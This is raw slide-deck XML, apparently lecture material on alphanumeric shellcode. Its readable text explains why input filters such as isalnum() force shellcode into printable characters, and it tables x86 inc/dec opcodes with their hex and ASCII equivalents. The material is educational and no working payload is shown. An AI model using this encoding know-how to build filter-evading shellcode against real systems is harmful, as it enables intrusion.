                  <a:pt x="1173058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26828" y="3319609"/>
            <a:ext cx="335280" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="335279" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="335165" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335165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61989" y="3317376"/>
            <a:ext cx="741680" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="741679" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="741310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741310" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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03300" y="3319609"/>
            <a:ext cx="1173480" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1173479" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1173058" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173058" y="356891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="356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76361" y="3317376"/>
            <a:ext cx="1464945" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1464945" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1464618" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1464618" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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2123" y="3679325"/>
            <a:ext cx="4074160" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4074160" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4073710" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073710" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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7407" y="4041275"/>
            <a:ext cx="93345" cy="361950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="93344" h="361950">
                <a:moveTo>
                  <a:pt x="0" y="361949"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="93316" y="361949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93316" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="361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69322" y="4041275"/>
            <a:ext cx="6095365" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6095365" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6094796" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6094796" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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7407" y="4403224"/>
            <a:ext cx="93345" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="93344" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="93316" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93316" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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69322" y="4403224"/>
            <a:ext cx="4258310" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4258310" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4257818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4257818" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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99423" y="1780679"/>
            <a:ext cx="7189470" cy="292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solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Scenario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69265" marR="5080">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Sometimes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF990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9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>program </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>accepts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only ASCII </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>characters</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>…  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>so you need </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shellcode!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41275">
              <a:lnSpc>
                <a:spcPts val="2850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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>isalnum</a:t>
            </a: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()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ctype.h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-775" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00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to  check if strings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alphanumeric</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-321945">
              <a:lnSpc>
                <a:spcPts val="2745"/>
              </a:lnSpc>
              <a:buChar char="-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alphanumeric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shellcode generally balloons in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endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-321945">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
              <a:buChar char="-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sometimes constricts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functionality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695780D1-CEF9-43EC-9745-2FD2DF50371E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610000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5506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Alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5149089" y="2420594"/>
            <a:ext cx="3769360" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3769359" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3769082" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3769082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9089" y="2725394"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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7471" y="2725394"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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5853" y="2725394"/>
            <a:ext cx="2094230" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2094229" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2093933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093933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49089" y="3030193"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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7471" y="3030193"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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65853" y="3030193"/>
            <a:ext cx="2094230" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2094229" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2093933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093933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49089" y="3334992"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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07471" y="3334992"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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65853" y="3334992"/>
            <a:ext cx="2094230" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2094229" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2093933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093933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9089" y="3639792"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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7471" y="3639792"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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65853" y="3639792"/>
            <a:ext cx="2094230" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2094229" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2093933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093933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49089" y="3944591"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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07471" y="3944591"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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65853" y="3944591"/>
            <a:ext cx="2094230" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2094229" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2093933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093933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49089" y="4249391"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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07471" y="4249391"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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65853" y="4249391"/>
            <a:ext cx="2094230" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2094229" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2093933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093933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49089" y="4554190"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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07471" y="4554190"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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65853" y="4554190"/>
            <a:ext cx="2094230" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2094229" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2093933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093933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49089" y="4858989"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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07471" y="4858989"/>
            <a:ext cx="558800" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="558800" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558382" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558382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136390" y="2342457"/>
            <a:ext cx="100203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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>OP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-1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onsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Code  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99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FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99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FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebx  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99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FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ecx  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99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FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>edx  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99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FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99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FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebx  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99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FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ecx  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>edx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65853" y="4858989"/>
            <a:ext cx="2094230" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2094229" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2093933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093933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808533" y="2342457"/>
            <a:ext cx="58483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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Hex</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="14604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0x40</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="14604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0x43</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="14604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0x41</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="14604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0x42</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="14604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0x48</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="14604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0x4B</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="14604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0x49</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="14604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0x4A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02394" y="2342457"/>
            <a:ext cx="7232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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="14604" marR="560070" algn="just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@  C  A  B  H  K  I  J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2923" y="1885186"/>
            <a:ext cx="1016000" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
